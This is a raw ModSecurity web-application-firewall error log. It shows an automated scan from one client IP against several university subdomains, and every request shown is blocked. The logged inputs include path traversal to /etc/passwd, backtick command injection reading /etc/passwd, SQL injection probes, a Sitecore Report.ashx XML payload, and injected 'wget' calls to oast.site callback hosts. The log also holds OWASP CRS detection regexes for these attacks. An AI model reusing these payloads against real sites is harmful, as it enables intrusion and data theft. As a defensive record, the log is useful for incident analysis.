[Tue Aug 29 11:33:29.319880 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: , Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\x0a                                System.String\\x0a                                System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c5 [hostname "ft.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARjjNIAAAAL"]
[Tue Aug 29 11:33:29.341522 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAANsAgAAAAAD"]
[Tue Aug 29 11:33:29.347341 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARLXxIAAAAQ"]
[Tue Aug 29 11:33:29.354506 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARv7RoAAAAY"]
[Tue Aug 29 11:33:29.369645 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAAOJKeEAAAAE"]
[Tue Aug 29 11:33:29.371605 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARTEPUAAAAG"]
[Tue Aug 29 11:33:29.373544 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARLXxMAAAAQ"]
[Tue Aug 29 11:33:29.387702 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11GcCo-f0AAARo8y0AAAAT"]
[Tue Aug 29 11:33:31.026477 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11G8Co-f0AAAR@KFEAAAAF"]
[Tue Aug 29 11:33:31.187094 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlUAAAAs"]
[Tue Aug 29 11:33:31.189759 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "pusatbahasa.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlUAAAAs"]
[Tue Aug 29 11:33:31.242511 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "www.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlcAAAAs"]
[Tue Aug 29 11:33:31.296252 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "informatika.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlgAAAAs"]
[Tue Aug 29 11:33:31.349503 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlkAAAAs"]
[Tue Aug 29 11:33:31.352745 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "journal.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlkAAAAs"]
[Tue Aug 29 11:33:31.373446 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11G8Co-f0AAAQKOloAAAAs"]
[Tue Aug 29 11:33:32.023593 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARv7SQAAAAY"]
[Tue Aug 29 11:33:32.029739 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARfwmcAAAAI"]
[Tue Aug 29 11:33:32.051170 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAANsAg4AAAAD"]
[Tue Aug 29 11:33:32.055010 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASBXOwAAAAM"]
[Tue Aug 29 11:33:32.072720 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARo8zgAAAAT"]
[Tue Aug 29 11:33:32.124772 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgi9p9c9fnwjjiu.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARo8zoAAAAT"]
[Tue Aug 29 11:33:32.132139 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgswpdq7nxek7rt.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARfwmwAAAAI"]
[Tue Aug 29 11:33:32.132208 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgo1jdfpdis55oh.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAANsAhIAAAAD"]
[Tue Aug 29 11:33:32.144915 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgoye7ipg4qyis9.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAASAHY8AAAAH"]
[Tue Aug 29 11:33:32.145464 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11HMCo-f0AAARo8zsAAAAT"]
[Tue Aug 29 11:33:32.314521 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASAHZIAAAAH"]
[Tue Aug 29 11:33:32.339025 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgewfepj8g6me3m.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARy-vMAAAAb"]
[Tue Aug 29 11:33:32.359119 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARfwnIAAAAI"]
[Tue Aug 29 11:33:32.359605 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARy-vQAAAAb"]
[Tue Aug 29 11:33:32.366305 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAANsAhcAAAAD"]
[Tue Aug 29 11:33:32.381058 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARv7TAAAAAY"]
